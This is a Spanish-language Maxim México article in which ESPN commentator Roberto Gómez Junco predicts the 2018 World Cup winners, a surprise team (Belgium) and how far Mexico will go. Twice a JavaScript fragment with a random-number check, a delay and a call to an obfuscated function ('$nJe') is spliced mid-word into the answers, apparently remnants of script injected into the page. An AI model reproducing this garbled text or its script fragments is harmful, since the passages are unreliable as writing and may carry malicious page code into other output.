Estas son las predicciones de Gómez Junco para Rusia 2018 | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Estas son las predicciones de Gómez Junco para Rusia 2018

    El especialista de ESPN nos platica sus pronósticos para el Mundial.

    Autor: Redacción Maxim 11 junio, 2018


    Gómez Junco pronosticos Rusia 2018

     

     

    Roberto Gómez Junco nos cuenta sus pronósticos para Rusia 2018

     

     

    ¿Qué país será campeón del mundo y por qué?

    Veo cuatro fuertes candom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andidatos: Alemania, España, Brasil y Francia. Decir cuál de ellos lo ganaría sería muy difícil, pero también veo muy difícil que alguno que no sea esos cuatro se quede con el título. Si tuviera que elegir a dos quizá me quedaría con Alemania y España porque son equipos que dominan lo que hacen, que tienen una magnífica generación de futbolistas y que se han visto en general más consistentes en su juego. Aunque está Brasil también, impresionante en la eliminatoria sudamericana, pero veo más confiable lo de España y Alemania.

     

     

    ¿Qué selección será la sorpresa del mundial y por qué?

    Quizá Bélgica, que ya se ha mencionado en otras ocasiones porque es un equipo con grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes futbolistas, que en la Eurocopa hace dos años había jugado un fútbol extraordinario pero una mala actuación la dejó fuera de ese torneo. La veo más madura y con futbolistas de élite, tiene cuatro o cinco futbolistas que están entre los mejores en el mundo y puede ser la gran sorpresa, que la selección sea la que muy pocos consideran para pelear por el título pero que pudiera acercarse a las últimas instancias.

     

     

    México llegará al quinto partido

    Como ha jugado el equipo mexicano, durante mucho tiempo, yo me conformaría con que llegaran al cuarto.

     

     

    Checa las predicciones de Christian Martinolli.

     

     

     

     

El especialista de ESPN nos platica sus pronósticos para el Mundial.